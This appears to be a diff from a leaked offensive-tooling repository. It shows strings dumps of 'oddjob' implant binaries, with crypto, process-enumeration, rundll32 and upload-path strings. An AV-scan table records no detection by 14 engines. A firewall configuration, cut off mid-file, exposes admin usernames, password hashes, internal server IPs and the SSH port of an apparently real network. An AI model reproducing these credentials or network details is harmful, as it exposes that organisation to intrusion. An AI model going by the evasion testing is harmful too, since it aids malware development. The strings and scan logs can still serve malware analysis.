+u$SS
+t!VV9u u
+9] SS
+v$;5
+PPPPPPPP
+_^[]
+0SSSSS
+PPPPPPPP
+u6SSj
+t	@@;
+uR9]
+9] u
+9E Yt
+SSSS
+txVS
+t0WWWWW
+Af#E
+SVWUj
+]_^[
+;t$,v-
+UQPXY]Y[
+VW|[;
+_^[]
+VVVVV
+~,WPV
+98t^
+tVPV
+t/9U
+~"WP
+^SSSSS
+j"^SSSSS
+QSWVj
+WWWWW
+<Xt	
+u,9E
+u29u
+SSSSV
+t<Vj
+t+SSVPV
+WWWWW
+u:hX)
+SVW}
+E 9}
+WWWW
+tb9} u
+@h44
+WWWWW
+_^[]
+WWWWW
+SSSSS
+WWWWW
+WWWWW
+^_[3
+CorExitProcess
+mscoree.dll
+runtime error 
+TLOSS error
+SING error
+DOMAIN error
+R6034
+An application has made an attempt to load the C runtime library incorrectly.
+Please contact the application's support team for more information.
+R6033
+- Attempt to use MSIL code from this assembly during native code initialization
+This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
+R6032
+- not enough space for locale information
+R6031
+- Attempt to initialize the CRT more than once.
+This indicates a bug in your application.
+R6030
+- CRT not initialized
+R6028
+- unable to initialize heap
+R6027
+- not enough space for lowio initialization
+R6026
+- not enough space for stdio initialization
+R6025
+- pure virtual function call
+R6024
+- not enough space for _onexit/atexit table
+R6019
+- unable to open console device
+R6018
+- unexpected heap error
+R6017
+- unexpected multithread lock error
+R6016
+- not enough space for thread data
+This application has requested the Runtime to terminate it in an unusual way.
+Please contact the application's support team for more information.
+R6009
+- not enough space for environment
+R6008
+- not enough space for arguments
+R6002
+- floating point support not loaded
+Microsoft Visual C++ Runtime Library
+<program name unknown>
+Runtime Error!
+Program: 
+(null)
+Invalid parameter passed to C runtime function.
+EncodePointer
+KERNEL32.DLL
+DecodePointer
+FlsFree
+FlsSetValue
+FlsGetValue
+FlsAlloc
+ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
+InitializeCriticalSectionAndSpinCount
+GetProcessWindowStation
+GetUserObjectInformationA
+GetLastActivePopup
+GetActiveWindow
+MessageBoxA
+USER32.DLL
+( 8PX
+700WP
+`h````
+xpxxxx
+('8PW
+700PP
+`h`hhh
+xppwpp
+ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
+ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
+HH:mm:ss
+dddd, MMMM dd, yyyy
+MM/dd/yy
+December
+November
+October
+September
+August
+July
+June
+April
+March
+February
+January
+Saturday
+Friday
+Thursday
+Wednesday
+Tuesday
+Monday
+Sunday
+SetThreadStackGuarantee
+SunMonTueWedThuFriSat
+JanFebMarAprMayJunJulAugSepOctNovDec
+CONOUT$
+IsWow64Process
+alwo
+p	PfH
+GetSystemTimeAsFileTime
+GetModuleFileNameW
+SetErrorMode
+GetFileAttributesW
+TerminateProcess
+GetTempPathW
+MoveFileW
+CloseHandle
+GetWindowsDirectoryW
+DeleteFileW
+GetCurrentProcessId
+GetTempFileNameW
+GetFileSize
+MoveFileExW
+WriteFile
+ReadFile
+CreateFileW
+GetLastError
+ExitProcess
+VirtualQuery
+CreateProcessW
+VirtualFree
+OpenProcess
+SetLastError
+VirtualAlloc
+Process32FirstW
+Process32NextW
+CreateToolhelp32Snapshot
+GetEnvironmentVariableW
+GetCurrentProcess
+GetComputerNameW
+GetModuleHandleW
+WideCharToMultiByte
+GetVersionExW
+GetProcAddress
+LocalAlloc
+LocalFree
+FindResourceW
+LoadResource
+SizeofResource
+LockResource
+HeapFree
+HeapAlloc
+HeapReAlloc
+GetCommandLineA
+GetVersionExA
+UnhandledExceptionFilter
+SetUnhandledExceptionFilter
+HeapDestroy
+HeapCreate
+DeleteCriticalSection
+LeaveCriticalSection
+EnterCriticalSection
+GetModuleHandleA
+GetStdHandle
+GetModuleFileNameA
+OutputDebugStringA
+TlsGetValue
+TlsAlloc
+TlsSetValue
+TlsFree
+InterlockedIncrement
+InterlockedDecrement
+GetCurrentThreadId
+GetCPInfo
+GetACP
+GetOEMCP
+SetHandleCount
+GetFileType
+GetStartupInfoA
+FreeEnvironmentStringsA
+GetEnvironmentStrings
+FreeEnvironmentStringsW
+GetEnvironmentStringsW
+QueryPerformanceCounter
+GetTickCount
+InitializeCriticalSection
+RtlUnwind
+LoadLibraryA
+SetFilePointer
+GetConsoleCP
+GetConsoleMode
+MultiByteToWideChar
+Sleep
+LCMapStringA
+LCMapStringW
+GetStringTypeA
+GetStringTypeW
+GetLocaleInfoA
+SetStdHandle
+WriteConsoleA
+GetConsoleOutputCP
+WriteConsoleW
+VirtualProtect
+GetSystemInfo
+CreateFileA
+FlushFileBuffers
+KERNEL32.dll
+wsprintfW
+USER32.dll
+CryptAcquireContextW
+CryptDeriveKey
+CryptReleaseContext
+CryptGenRandom
+CryptEncrypt
+CryptCreateHash
+CryptDestroyKey
+CryptDecrypt
+CryptDestroyHash
+CryptHashData
+OpenProcessToken
+GetUserNameW
+GetTokenInformation
+EqualSid
+AllocateAndInitializeSid
+FreeSid
+ADVAPI32.dll
+CoTaskMemFree
+CoCreateInstance
+CoUninitialize
+CoInitializeEx
+ole32.dll
+ABABABABABABABABABAB.dll
+start
+                          
+abcdefghijklmnopqrstuvwxyz
+ABCDEFGHIJKLMNOPQRSTUVWXYZ
+                          
+abcdefghijklmnopqrstuvwxyz
+ABCDEFGHIJKLMNOPQRSTUVWXYZ
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+    <security>
+      <requestedPrivileges>
+        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+</assembly>PA
+5/6L6
+888C8_8q8
+:>;W;j;`<f<s<
+<==q=
+>+>x>
+?0?{?
+5I5Z5
+546G6N6p6x6
+7`8i8
+909T9m9{9
+9p:{:
+[0w0
+202?2X2
+9K9W9
+=h=n=}=
+>!?[?a?j?o?{?
+Q0[0o4
+5+8C8b8
+8%9A9
+:B:a:k:u:
+;);;;
+>d>y>
+0 1T1Z1f1
+292@2K3
+6.646:6?6_6d6n6
+:&:.:6:>:J:S:X:^:h:q:|:
+<&<0<<<E<M<W<]<c<p<w<
+="=+=>=b=
+>,>2>9>F>M>S>[>a>s>x>
+101C1N1T1Z1_1h1
+2+2<2B2S2
+2T6`6
+919N9
+;T;o;u;~;
+;3<;<M<U<h<x<}<
+===B=M=R=p=
+>Q>i>t>
+?>?Q?c?
+j0r0
+749d9
+?"?-?9?N?T?]?d?|?
+0#000Q0[0v0
+152=2
+3#3*30373=3E3L3Q3Y3b3n3s3x3~3
+4=4C4
+6C6a6h6l6p6t6x6|6
+6F7Q7l7s7x7|7
+8 8j8p8t8x8|8
+9Z9q9
+:/;<;F;T;];g;
+<A<[<
+=&>2>E>W>r>z>
+>!?J?[?~?
+C0m0
+2)2e2V3
+5P5X5
+6K6]6
+707=7
+8j:}:
+:0;6;L;W;n;z;
+<'<Y<r<
+=)=9=k=q=z=
+=*>_>x>
+? ?$?n?t?x?|?
+0 0A0k0
+293G3
+4 4%454d4r4
+5(6B6Y6_6r6w6
+899F9e9}9
+30d0z0
+3*353C3Q3X3g3s3
+3&454>4[4
+9+9*:
+>#>c>
+3"545F5h5z5
+597F7N7\7n7z7
+:5;A;
+=.=D=Y=y=
+=6>R>
+?'?D?N?W?b?w?~?
+0#0(060
+121=1`1
+1g2o2
+7*7D7a7
+9a:t:
+;T<h=
+> >/>
+>8?d?
+1L2{2P4V4\4b4
+2$2(2
+\:`:
+; ;$;,;0;8;<;D;H;P;T;\;`;h;l;
+<0<P<l<p<
+=0=L=P=l=p=x=|=
+>0>P>
+3$3,343<3D3L3T3\3`3d3
+9(989\9h9l9p9t9x9
+9@:D:H:L:P:T:X:\:`:d:h:p:
+= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
+(null)
+kernel32.dll
+         (((((                  H
+         h((((                  H
+                                 H
+kernel32
+https
+https
+https
+version
+%s%s%d%d%s
+COMMONPROGRAMFILES(x86)
+<Process pid=%d ppid=%d threadCount=%d %s\>
+%s\%s
+rundll
+rundll32
+rundll32
+BINARY
+Microsoft Enhanced Cryptographic Provider v1.0
+Microsoft Enhanced Cryptographic Provider v1.0
+ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-
+Microsoft Enhanced Cryptographic Provider v1.0
+Microsoft Enhanced Cryptographic Provider v1.0
+Process id: %lu
+%s/%s%s
+%s\Temp\%s
+%s%s
+%s%d%dupdate.xml
+%s/%d%dupdate.xml
+%s/uploads/%d%d%d%d%d%d%d%d%d%s
+rundll32.exe "%s",%S %s%s
+rundll32.exe

oddjob/Not-For-Release/oddjob_v3_x86.exestrings.txt

@@ -0,0 +1,730 @@
+QQSVW
+SVW3
+pSVW
+CDPP
+h`9A
+Shh9A
+_[t	
+uXhx9A
+PWVj
+@@f;
+uM!E
+SVWh
+Phx8A
+@@f;
+h|4A
+h 9A
+QSVWhX6A
+t1WPV
+tdVSP
+tB9}
+PWWV
+u39]
+tUSh
+54 A
+Shp6A
+uXjHSh
+PWWh
+t-Wj
+uq9}
+PSWWW
+PSWj
+AAHHJu
+Wj Y
+j=Yf
+j=Yf
+u 9E
+YY9}
+4891r)
+D$$ 
+D$hSP
+D$`P
+D$ P
+D$ P
+QQSV
+54 A
+u#jHj
+t;8]
+u6jD
+PVVh
+It&It
+@@f;
+@@f;
+AAf;
+@@f;
+hP5A
+vMh@4A
+hP4A
+=x A
+SSSS
+w6SSj
+=x A
+SSSS
+w9SSj
+ SVW3
+PjYjCV
+QQVW
+jUY3
+9A;M
+SuPW
+@@f;
+@@f;
+t!SWP
+@@f;
+t>Sj
+_^9]
+jUZ3
+PSSSSSSh 
+PSSj
+h@:A
+=8|A
+t	VP
+h`:A
+;5(|A
+GGBBf
+SSSSS
+AAf9
+WWWWW
+=8|A
+uaVj
+uL9=HgA
+AAFFf
+=8|A
+;5(|A
+wIVSP
+9=HgA
+FVSj
+VVVVV
+r	f=Z
+r	f=Z
+ CCGG
+t=f;
+CCGG
+95xgA
+VVVVV
+r	f=Z
+r	f=Z
+ GGBB
+8VVVVV
+f91t
+AAKu
+AAGGf;
+_^[]
+=h_A
+MZu3
+YQPj
+5``A
+=\`A
+%P`A
+-L`A
+h("A
+VVVVV
+VVVVV
+% |A
+5P A
+ueSj
+=4|A
+5 |A
+5$|A
+5 |A
+5$|A
+@_^[
+ VW}
+j?^;
+Y__^[
+9csm
+h@"A
+h0"A
+VVVVV
+VVVVV
+YYu6h
+F95(dA
+5$dA
+Yh "A
+5(dA
+QQSV3
+SSSSS
+PPPPP
+SSSSS
+SSSSS
+SSSSS
+5DgA
+_[^]
+_^[]
+VVVV
+5hZA
+5tZA
+5pZA
+RPSV
+90tN
+@t7f
+PPPPP
+h (A
+5pSA
+5pSA
+hd(A
+hT(A
+5pSA
+5pSA
+hd(A
+ht(A
+5pSA
+5PgA
+5pSA
+5XgA
+h(;A
+hd(A
+t$hT(A
+ht(A
+5tSA
+5pSA
+YYt1V
+5tSA
+5TgA
+hH;A
+Whd(A
+=LgA
+=PgA
+=TgA
+5TgA
+5PgA
+5LgA
+5PgA
+5TgA
+5XgA
+5LgA
+5tSA
+5TgA
+hp;A
+0A@@Ju
+95\gA
+E`gA
+Wto=
+Y_^[]
+_^[]
+Fpt"
+8csm
+S99t
+~du	
+ w	f
+"u	3
+SVW3
+0@@f
+=d_A
+t.WSR
+PPPPP
+5d_A
+%d_A
+j"AA
+AACf
+9"uI
+t69]
+ t+f
+SVWh
+@@f9
+@@f9
+t.SSj
+@@f;
+5$!A
+j$j _W
+Nj$j 
+t<!E
+9MZu+
+@\f=
+WWWWW
+t!h\)A
+h4)A
+URPQQh
+L$,3
+UVWS
+[_^]
+SVWj
+_^[]
+9MZt
+_^[]
+h0<A
+hP<A
+j hp<A
+t+Ht
+PPPPP
+ SVW
+SSSSS
+hx)A
+tm95
+SSSSS
+0SSSSS
+_^[]
+0SSSSS
+_^[]
+VVVVV
+WWWWW
+WWWWW
+VVVVV
+VVVVV
+GGAAf
+@@FFf
+@@FF
+WWWWW
+VVVVV
+= dA
+VVVVV
+VVVVV
+Yt"V
+Yt.V
+Yt"V
+Yt.V
+Yt"V
+YYt}
+~%9M
+QVj	
+r 8^
+v	N+D$
+oV f
+o^0f
+of@f
+onPf
+ov`f
+o~pf
+u8SS3
+u$SS
+t!VV9u u
+9] SS
+v$;5
+PPPPPPPP
+_^[]
+0SSSSS
+PPPPPPPP
+5\!A
+u6SSj
+t	@@;
+uR9]
+9] u
+9E Yt
+5x A
+SSSS
+=X!A
+txVS
+t0WWWWW
+Af#E
+SVW3
+0WWWWW
+BBFFf;
+_^[]
+SVWUj
+]_^[
+;t$,v-
+UQPXY]Y[
+VW|[;
+_^[]
+VVVVV
+h(=A
+95$^A
+=L_A
+=$^A
+5$^A
+hH=A
+~,WPV
+hh=A
+98t^
+tVPV
+t/9U
+~"WP
+^SSSSS
+j"^SSSSS
+QSWVj
+WWWWW
+<Xt	
+u,9E
+u29u
+=x A
+SSSSV
+t<Vj
+t+SSVPV
+WWWWW
+u:h\)A
+SVW}
+5d!A
+E 9}
+WWWW
+tb9} u
+@h44A
+WWWWW
+_^[]
+WWWWW
+SSSSS
+WWWWW
+WWWWW
+^_[3
+%\ A
+%` A
+%d A
+%@!A
+CorExitProcess
+mscoree.dll
+runtime error 
+TLOSS error
+SING error
+DOMAIN error
+R6034
+An application has made an attempt to load the C runtime library incorrectly.
+Please contact the application's support team for more information.
+R6033
+- Attempt to use MSIL code from this assembly during native code initialization
+This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
+R6032
+- not enough space for locale information
+R6031
+- Attempt to initialize the CRT more than once.
+This indicates a bug in your application.
+R6030
+- CRT not initialized
+R6028
+- unable to initialize heap
+R6027
+- not enough space for lowio initialization
+R6026
+- not enough space for stdio initialization
+R6025
+- pure virtual function call
+R6024
+- not enough space for _onexit/atexit table
+R6019
+- unable to open console device
+R6018
+- unexpected heap error
+R6017
+- unexpected multithread lock error
+R6016
+- not enough space for thread data
+This application has requested the Runtime to terminate it in an unusual way.
+Please contact the application's support team for more information.
+R6009
+- not enough space for environment
+R6008
+- not enough space for arguments
+R6002
+- floating point support not loaded
+Microsoft Visual C++ Runtime Library
+<program name unknown>
+Runtime Error!
+Program: 
+(null)
+Invalid parameter passed to C runtime function.
+EncodePointer
+KERNEL32.DLL
+DecodePointer
+FlsFree
+FlsSetValue
+FlsGetValue
+FlsAlloc
+ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
+InitializeCriticalSectionAndSpinCount
+GetProcessWindowStation
+GetUserObjectInformationA
+GetLastActivePopup
+GetActiveWindow
+MessageBoxA
+USER32.DLL
+( 8PX
+700WP
+`h````
+xpxxxx
+('8PW
+700PP
+`h`hhh
+xppwpp
+ !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
+ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
+HH:mm:ss
+dddd, MMMM dd, yyyy
+MM/dd/yy
+December
+November
+October
+September
+August
+July
+June
+April
+March
+February
+January
+Saturday
+Friday
+Thursday
+Wednesday
+Tuesday
+Monday
+Sunday
+SetThreadStackGuarantee
+SunMonTueWedThuFriSat
+JanFebMarAprMayJunJulAugSepOctNovDec
+CONOUT$
+IsWow64Process
+alwo
+p	PfH
+GetSystemTimeAsFileTime
+GetModuleFileNameW
+SetErrorMode
+GetFileAttributesW
+GetTempPathW
+MoveFileW
+GetWindowsDirectoryW
+DeleteFileW
+GetCurrentProcessId
+GetTempFileNameW
+GetFileSize
+MoveFileExW
+WriteFile
+ReadFile
+CreateFileW
+GetLastError
+CloseHandle
+ExitProcess
+VirtualQuery
+CreateProcessW
+VirtualFree
+SetLastError
+VirtualAlloc
+Process32FirstW
+Process32NextW
+CreateToolhelp32Snapshot
+GetEnvironmentVariableW
+GetCurrentProcess
+GetComputerNameW
+GetModuleHandleW
+WideCharToMultiByte
+GetVersionExW
+GetProcAddress
+LocalAlloc
+LocalFree
+FindResourceW
+LoadResource
+SizeofResource
+LockResource
+HeapFree
+HeapAlloc
+HeapReAlloc
+GetVersionExA
+GetStartupInfoW
+TerminateProcess
+UnhandledExceptionFilter
+SetUnhandledExceptionFilter
+HeapDestroy
+HeapCreate
+DeleteCriticalSection
+LeaveCriticalSection
+EnterCriticalSection
+GetModuleHandleA
+GetStdHandle
+GetModuleFileNameA
+OutputDebugStringA
+TlsGetValue
+TlsAlloc
+TlsSetValue
+TlsFree
+InterlockedIncrement
+InterlockedDecrement
+GetCurrentThreadId
+GetCPInfo
+GetACP
+GetOEMCP
+FreeEnvironmentStringsA
+MultiByteToWideChar
+GetEnvironmentStrings
+FreeEnvironmentStringsW
+GetEnvironmentStringsW
+GetCommandLineA
+GetCommandLineW
+SetHandleCount
+GetFileType
+GetStartupInfoA
+QueryPerformanceCounter
+GetTickCount
+InitializeCriticalSection
+RtlUnwind
+LoadLibraryA
+SetFilePointer
+GetConsoleCP
+GetConsoleMode
+Sleep
+LCMapStringA
+LCMapStringW
+GetStringTypeA
+GetStringTypeW
+GetLocaleInfoA
+SetStdHandle
+WriteConsoleA
+GetConsoleOutputCP
+WriteConsoleW
+VirtualProtect
+GetSystemInfo
+CreateFileA
+FlushFileBuffers
+KERNEL32.dll
+wsprintfW
+USER32.dll
+CryptAcquireContextW
+CryptDeriveKey
+CryptReleaseContext
+CryptGenRandom
+CryptEncrypt
+CryptCreateHash
+CryptDestroyKey
+CryptDecrypt
+CryptDestroyHash
+CryptHashData
+OpenProcessToken
+GetUserNameW
+GetTokenInformation
+EqualSid
+AllocateAndInitializeSid
+FreeSid
+ADVAPI32.dll
+CoTaskMemFree
+CoCreateInstance
+CoUninitialize
+CoInitializeEx
+ole32.dll
+                          
+abcdefghijklmnopqrstuvwxyz
+ABCDEFGHIJKLMNOPQRSTUVWXYZ
+                          
+abcdefghijklmnopqrstuvwxyz
+ABCDEFGHIJKLMNOPQRSTUVWXYZ
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+    <security>
+      <requestedPrivileges>
+        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+</assembly>PA
+5/6L6
+848:8V8
+:4;G;=<C<P<e<o<{<
+0I2h2u2
+3\4x4
+5[5b5v5
+6!6.646A6G6P6t6
+6P7`7
+9"9k9z9
+:(:7:V:i:
+;#<5<F>
+;.<3<K<p<}<
+>8>B>
+657b7h7
+8E8\8c8n8
+9"9q9w9
+:&:]:k:I<}<
+<4=:=F=
+>H?N?r?
+"0a0i0~0
+4-464<4I4S4^4q4|4
+5[5e5
+5X6^6d6j6p6v6}6
+7!7(7;7W7z7
+7-848G8^8d8j8}8
+9)9/989K9o9
+:$:9:?:F:S:Z:`:h:n:
+= =+===P=[=a=g=l=u=
+>8>I>O>`>
+a2m2
+5#5+5A5^5
+8C8K8]8e8x8
+9$9M9R9]9b9
+9%:2:O:
+:);N;s;
+=9>&?5?P?
+:!:%:5:
+;#;*;Q;W;b;n;
+<"<,<2<?<N<U<b<
+=F=l=
+>%>/>g>o>
+?&?2?7?<?B?F?L?Q?W?_?g?y?
+21282<2@2D2H2L2P2T2
+3!3<3C3H3L3P3q3
+3:4@4D4H4L4
+4*5A5
+7$7-777n7v7
+:':B:J:R:i:
+;+;N;
+<#=k=
+=5>M?S?v?
+1o1y1~1
+4)4/444<4
+5 5-545~5
+5#6`6
+6(7<7]7c7
+8"8J8c8
+8:9@9b9
+:X:x:
+;=;C;L;S;^;j;
+<?<X<_<g<l<p<t<
+=N=T=X=\=`=
+>!>K>}>
+>]?i?
+2D2R2
+3o3x3~3
+4"494?4R4W4k4q4
+5_5x5
+7&7E7]7
+:j<;=
+>D>Z>
+1#11181G1S1h1
+2;2c2
+8i:y:
+>h?r?
+3&3H3Z3l3~3
+5&5.5<5N5Z5e5
+;(;=;];
+=(=2=;=F=[=b=h=~=
+?!?D?
+K0S0
+0P2n2
+5(5E5q5
+6+7m7
+7E8X8)9C9I9\9i9q9~9
+=S=]=
+?B?L?l?
+2(2,2
+: :X:x:
+; ;@;`;l;
+<$<(<D<H<d<h<
+= =@=`=
+3$3,343<3D3L3T3\3d3h3l3
+9(989H9l9x9|9
+9P:T:X:\:`:d:h:l:p:t:x:
+= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
+(null)
+kernel32.dll
+         (((((                  H
+         h((((                  H
+                                 H
+kernel32
+https
+https
+https
+version
+%s%s%d%d%s
+COMMONPROGRAMFILES(x86)
+<Process pid=%d ppid=%d threadCount=%d %s\>
+%s\%s
+rundll
+rundll32
+rundll32
+BINARY
+Microsoft Enhanced Cryptographic Provider v1.0
+Microsoft Enhanced Cryptographic Provider v1.0
+ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-
+Microsoft Enhanced Cryptographic Provider v1.0
+Microsoft Enhanced Cryptographic Provider v1.0
+Process id: %lu
+%s/%s%s
+%s\Temp\%s
+%s%s
+%s%d%dupdate.xml
+%s/%d%dupdate.xml
+%s/uploads/%d%d%d%d%d%d%d%d%d%s
+%s %s%s

oddjob/Testing-Docs/tungsten_flame.txt

@@ -0,0 +1,74 @@
+oddjob_v3_x64.exe
+
+AV Engine	Country	Signature	Updated	Info
+Alwil (avast)	CZ	no_virus	2013-07-08 19:22:16	
+Avira (antivir)	DE	no_virus	2013-07-07 00:51:32	
+ClamAV		no_virus	2013-07-07 02:20:11	
+Eset (nod32)	US	no_virus	2013-07-08 11:38:54	
+Frisk (f-prot)	IS	no_virus	2013-07-07 22:23:41	
+F-Secure	FI	no_virus	2013-07-08 10:04:09	
+Kaspersky	RU	no_virus	2013-07-08 19:29:35	
+Mcafee	US	no_virus	2013-07-06 14:40:00	
+MS Security Essentials	US	no_virus	2013-07-08 10:07:55	
+Norman	NO	no_virus	2013-07-08 04:28:54	
+Panda	ES	no_virus	2013-07-07 15:33:32	
+Rising	CN	no_virus	2013-07-08 10:07:29	
+Symantec	US	no_virus	2013-07-06 09:00:00	
+Trend Micro	JP	no_virus	2013-07-07 02:06:49
+
+
+oddjob_v3_x86.exe
+
+AV Engine	Country	Signature	Updated	Info
+Alwil (avast)	CZ	no_virus	2013-07-08 19:22:16	
+Avira (antivir)	DE	no_virus	2013-07-07 00:51:32	
+ClamAV		no_virus	2013-07-07 02:20:11	
+Eset (nod32)	US	no_virus	2013-07-08 11:38:54	
+Frisk (f-prot)	IS	no_virus	2013-07-07 22:23:41	
+F-Secure	FI	no_virus	2013-07-08 10:04:09	
+Kaspersky	RU	no_virus	2013-07-08 19:29:35	
+Mcafee	US	no_virus	2013-07-06 14:40:00	
+MS Security Essentials	US	no_virus	2013-07-08 10:07:55	
+Norman	NO	no_virus	2013-07-08 04:28:54	
+Panda	ES	no_virus	2013-07-07 15:33:32	
+Rising	CN	no_virus	2013-07-08 10:07:29	
+Symantec	US	no_virus	2013-07-06 09:00:00	
+Trend Micro	JP	no_virus	2013-07-07 02:06:49	
+
+
+oddjob_v3_x86.dll
+
+AV Engine	Country	Signature	Updated	Info
+Alwil (avast)	CZ	no_virus	2013-07-08 19:22:16	
+Avira (antivir)	DE	no_virus	2013-07-07 00:51:32	
+ClamAV		no_virus	2013-07-07 02:20:11	
+Eset (nod32)	US	no_virus	2013-07-08 11:38:54	
+Frisk (f-prot)	IS	no_virus	2013-07-07 22:23:41	
+F-Secure	FI	no_virus	2013-07-08 10:04:09	
+Kaspersky	RU	no_virus	2013-07-08 19:29:35	
+Mcafee	US	no_virus	2013-07-06 14:40:00	
+MS Security Essentials	US	no_virus	2013-07-08 10:07:55	
+Norman	NO	no_virus	2013-07-08 04:28:54	
+Panda	ES	no_virus	2013-07-07 15:33:32	
+Rising	CN	no_virus	2013-07-08 10:07:29	
+Symantec	US	no_virus	2013-07-06 09:00:00	
+Trend Micro	JP	no_virus	2013-07-07 02:06:49	
+
+
+oddjob_v3_x64.dll
+
+AV Engine	Country	Signature	Updated	Info
+Alwil (avast)	CZ	no_virus	2013-07-08 19:22:16	
+Avira (antivir)	DE	no_virus	2013-07-07 00:51:32	
+ClamAV		no_virus	2013-07-07 02:20:11	
+Eset (nod32)	US	no_virus	2013-07-08 11:38:54	
+Frisk (f-prot)	IS	no_virus	2013-07-07 22:23:41	
+F-Secure	FI	no_virus	2013-07-08 10:04:09	
+Kaspersky	RU	no_virus	2013-07-08 19:29:35	
+Mcafee	US	no_virus	2013-07-06 14:40:00	
+MS Security Essentials	US	no_virus	2013-07-08 10:07:55	
+Norman	NO	no_virus	2013-07-08 04:28:54	
+Panda	ES	no_virus	2013-07-07 15:33:32	
+Rising	CN	no_virus	2013-07-08 10:07:29	
+Symantec	US	no_virus	2013-07-06 09:00:00	
+Trend Micro	JP	no_virus	2013-07-07 02:06:49	

swift/00503_0_254.242_2013mar02

@@ -0,0 +1,446 @@
+unset key protection enable
+set clock dst-off
+set clock timezone 4
+set vrouter trust-vr sharable
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset auto-route-export
+set protocol ospf
+set enable
+set area 0.0.0.1 
+exit
+exit
+set service "NSM_Managed_Client_TCP" protocol tcp src-port 0-65535 dst-port 7800-7800 
+set service "NSM_GUI_Client_TCP" protocol tcp src-port 0-65535 dst-port 7801-7801 
+set service "NSM_HA_TCP" protocol tcp src-port 0-65535 dst-port 7802-7802 
+set service "NSM_Managed_IDP_TCP" protocol tcp src-port 0-65535 dst-port 7803-7803 
+set service "NSM_GUI_Client_7808_TCP" protocol tcp src-port 0-65535 dst-port 7808-7808 
+set service "NSM_SSLVPN_TCP" protocol tcp src-port 0-65535 dst-port 7804-7804 
+set service "NSM_7804" protocol tcp src-port 0-65535 dst-port 7804-7804 
+set service "OpManager" protocol tcp src-port 0-65535 dst-port 8060-8060 
+set service "OpManagerVIP" protocol tcp src-port 0-65535 dst-port 9090-9090 
+set service "IT360_8100_TCP" protocol tcp src-port 0-65535 dst-port 8100-8100 
+set service "IT360_8443_TCP" protocol tcp src-port 0-65535 dst-port 8443-8443 
+set service "IT360_8400_TCP" protocol tcp src-port 0-65535 dst-port 8400-8400 
+set service "IT360_9996_UDP" protocol udp src-port 0-65535 dst-port 9996-9996 
+set service "IT360_9443_TCP" protocol tcp src-port 0-65535 dst-port 9443-9443 
+set alg appleichat enable
+unset alg appleichat re-assembly enable
+set alg sctp enable
+set auth-server "Local" id 0
+set auth-server "Local" server-name "Local"
+set auth-server "RSA Ace/Server" id 1
+set auth-server "RSA Ace/Server" server-name "192.168.206.100"
+set auth-server "RSA Ace/Server" backup1 "192.168.206.101"
+set auth-server "RSA Ace/Server" account-type xauth 
+set auth-server "RSA Ace/Server" type securid
+set auth default auth server "Local"
+set auth radius accounting port 1646
+set admin name "netscreen"
+set admin password "nHr9JSr5KZ9PcKREMsvHkCEtGSDrpn"
+set admin user "msaeed" password "nF3dKrrkHDHCckxALsfARkBtenLoAn" privilege "all"
+set admin user "adesear" password "nIVbOVrXL41KckIARs+ARwJteKFZYn" privilege "all"
+set admin user "juy" password "nGB6DqrpKxQAc4pI/sxHVLIt1aEskn" privilege "all"
+set admin user "kbaluyot" password "nMSQP4rHLyxHcWqBmsqP9pMtnMGPYn" privilege "all"
+set admin ssh port 2194
+set admin http redirect
+set admin auth web timeout 10
+set admin auth dial-in timeout 3
+set admin auth server "Local"
+set admin format dos
+set zone "Trust" vrouter "trust-vr"
+set zone "Untrust" vrouter "trust-vr"
+set zone "DMZ" vrouter "trust-vr"
+set zone "VLAN" vrouter "trust-vr"
+set zone "Untrust-Tun" vrouter "trust-vr"
+set zone "Trust" tcp-rst 
+set zone "Untrust" block 
+unset zone "Untrust" tcp-rst 
+set zone "MGT" block 
+unset zone "V1-Trust" tcp-rst 
+unset zone "V1-Untrust" tcp-rst 
+set zone "DMZ" tcp-rst 
+unset zone "V1-DMZ" tcp-rst 
+set zone "VLAN" block 
+unset zone "VLAN" tcp-rst 
+set zone "Untrust" screen tear-drop
+set zone "Untrust" screen syn-flood
+set zone "Untrust" screen ping-death
+set zone "Untrust" screen ip-filter-src
+set zone "Untrust" screen land
+set zone "V1-Untrust" screen tear-drop
+set zone "V1-Untrust" screen syn-flood
+set zone "V1-Untrust" screen ping-death
+set zone "V1-Untrust" screen ip-filter-src
+set zone "V1-Untrust" screen land
+set interface "bri0/0" zone "Untrust"
+set interface "ethernet0/0" zone "Untrust"
+set interface "ethernet0/1" zone "DMZ"
+set interface "ethernet0/6" zone "HA"
+set interface "bgroup0" zone "Trust"
+set interface "tunnel.4" zone "Untrust"
+set interface "tunnel.7" zone "Untrust"
+set interface bgroup0 port ethernet0/2
+set interface bgroup0 port ethernet0/3
+set interface bgroup0 port ethernet0/4
